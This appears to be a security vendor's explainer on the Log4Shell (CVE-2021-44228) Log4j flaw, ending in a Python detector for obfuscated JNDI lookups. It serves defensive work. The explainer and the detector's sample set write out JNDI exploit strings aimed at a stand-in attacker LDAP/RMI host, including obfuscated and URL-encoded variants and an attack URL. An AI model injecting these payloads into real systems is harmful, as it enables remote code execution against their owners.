Background

CVE-2021-44228, also known as Log4Shell, is a remote code execution vulnerability in the popular Java logging library Log4j (affecting the Log4j 2 branch, versions 2.0-beta9 through 2.14.1).


Log4j is used by a great deal of Java enterprise software to implement logging. The vulnerability is caused by a feature added in 2013 that expands variables ("lookups") inside log messages. For example, `${env:FOOBAR}` in a log message expands to the value of the environment variable `FOOBAR`. Lookups can also resolve names through JNDI (Java Naming and Directory Interface), and this is where the vulnerability manifests. If the string `${jndi:ldap://attacker-controlled.com/x}` is logged via Log4j, the library performs a JNDI lookup against the attacker-controlled LDAP server; the server's response can point the Java runtime at a remote, attacker-controlled Java class, which is then loaded and executed, giving the attacker remote code execution. Note that the lookup is triggered by the content of the message, not by the calling code: the application does not have to use the string as a format pattern, it only has to log it.

Attack procedure

The vulnerability is so dangerous because it is so simple to exploit: all an attacker has to do is get the exploit string `${jndi:ldap://attacker-controlled.com/x}` into any input that a Java application logs via Log4j. Since Log4j is practically the default logging library for Java enterprise applications, a large share of them were vulnerable to CVE-2021-44228. Most applications log specific actions by default; a web server, for example, logs the request path and often request headers. An attacker would simply need to request the URL `http://vulnerable-webserver.com/${jndi:ldap://attacker-controlled.com/x}` or set the User-Agent header to the exploit string in order to compromise a system, provided the application logs that field.

The exploit string can travel via any path, as long as it ends up being logged by a Java application using Log4j. For example, a Java-based email client could receive an email whose subject is set to the Log4Shell exploit string. Once the Java-based email client writes to its logs via the Log4j library that it has received a new email, including the subject, the exploit would trigger.

Hornetsecurity Statement

Hornetsecurity already detects the malicious exploit string in emails, but so far has not observed attackers using emails directly as an attack vector. The cases observed so far (apart from security companies and customers testing for the vulnerability) originate from web forms that were submitted with the Log4Shell exploit string in one of their fields: the owner of the web form then received a notification email containing the form's fields, and with them the exploit string.

Hornetsecurity is monitoring emails for CVE-2021-44228 exploitation patterns and will continuously expand detection to cover new obfuscations, in preparation for potential targeted email campaigns using the Log4Shell exploit.
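To make the attack paths and the obfuscation problem concrete, here is an added detection example. It is not Hornetsecurity's detection logic and not code from the original post. It takes the inputs described above (a web server access log line, a User-Agent header, an email subject), normalizes the nesting tricks that appeared within days of the disclosure (`${lower:...}`, `${upper:...}` and the `${...:-x}` default-value form, all of which Log4j resolves before the `jndi` prefix is matched) plus URL encoding, and then looks for a JNDI lookup in the result. All sample lines, hostnames and IP addresses are constructed for illustration.

```python
import re
import urllib.parse

# Constructed sample inputs (not real telemetry). The first three are the
# attack paths from the text; the next three are obfuscated or encoded
# variants that a naive search for the literal "${jndi:" would miss.
SAMPLES = {
    "access_log": '203.0.113.5 - - [10/Dec/2021:12:00:00 +0000] '
                  '"GET /${jndi:ldap://attacker-controlled.com/x} HTTP/1.1" 404 0',
    "user_agent": "Mozilla/5.0 ${jndi:ldap://attacker-controlled.com/x}",
    "email_subject": "Invoice ${jndi:rmi://attacker-controlled.com/x}",
    "obfuscated_lower": "${${lower:j}ndi:${lower:l}dap://attacker-controlled.com/x}",
    "obfuscated_default": "${${env:NOPE:-j}ndi:${::-l}dap://attacker-controlled.com/x}",
    "url_encoded": "GET /%24%7Bjndi%3Aldap%3A%2F%2Fattacker-controlled.com%2Fx%7D HTTP/1.1",
    "benign": "User logged in: ${env:USER} from 198.51.100.7",
}

# Each pattern refuses to cross a brace ([^{}]*), so nested lookups are
# resolved innermost-first, the same order Log4j's interpolator uses.
LOOKUP_LOWER = re.compile(r"\$\{\s*lower\s*:([^{}]*)\}", re.IGNORECASE)
LOOKUP_UPPER = re.compile(r"\$\{\s*upper\s*:([^{}]*)\}", re.IGNORECASE)
# ${anything:-default} collapses to "default" when the lookup yields nothing;
# attackers use ${::-j} or ${env:NOPE:-j} to spell "jndi" one letter at a time.
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# Log4j matches the lookup prefix case-insensitively, so ${JnDi:...} works too.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL encoding and collapse nested lookups until nothing changes.

    max_rounds bounds the work on adversarial input with very deep nesting.
    """
    text = urllib.parse.unquote(text)  # %24%7B -> ${
    for _ in range(max_rounds):
        before = text
        text = LOOKUP_LOWER.sub(lambda m: m.group(1).lower(), text)
        text = LOOKUP_UPPER.sub(lambda m: m.group(1).upper(), text)
        text = LOOKUP_DEFAULT.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def detect_log4shell(line):
    """Return a verdict for one logged string.

    'scheme' is the JNDI provider the string would contact (ldap, rmi, dns, ...),
    which is useful for triage: ldap/rmi are the classic code-loading paths,
    dns is typically a blind scanner probe.
    """
    normalized = normalize(line)
    match = JNDI_LOOKUP.search(normalized)
    return {
        "detected": match is not None,
        "scheme": match.group(1).lower() if match else None,
        "normalized": normalized,
    }


def scan(samples):
    """Map each sample name to the JNDI scheme found, or None if clean."""
    return {name: detect_log4shell(line)["scheme"] for name, line in samples.items()}


if __name__ == "__main__":
    for name, scheme in scan(SAMPLES).items():
        print(f"{name:20s} -> {'LOG4SHELL via ' + scheme if scheme else 'clean'}")
```

Normalization of this kind catches the obfuscations that were circulating at the time, but it is a moving target: every additional Log4j lookup type is another layer an attacker can wrap around the four letters `jndi`, so a detector like this belongs in front of a patched or lookup-disabled Log4j, not in place of one. The `benign` sample shows why the search is for the `jndi` prefix specifically rather than for any `${...}` lookup, which would flood a mail or web log with false positives.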

References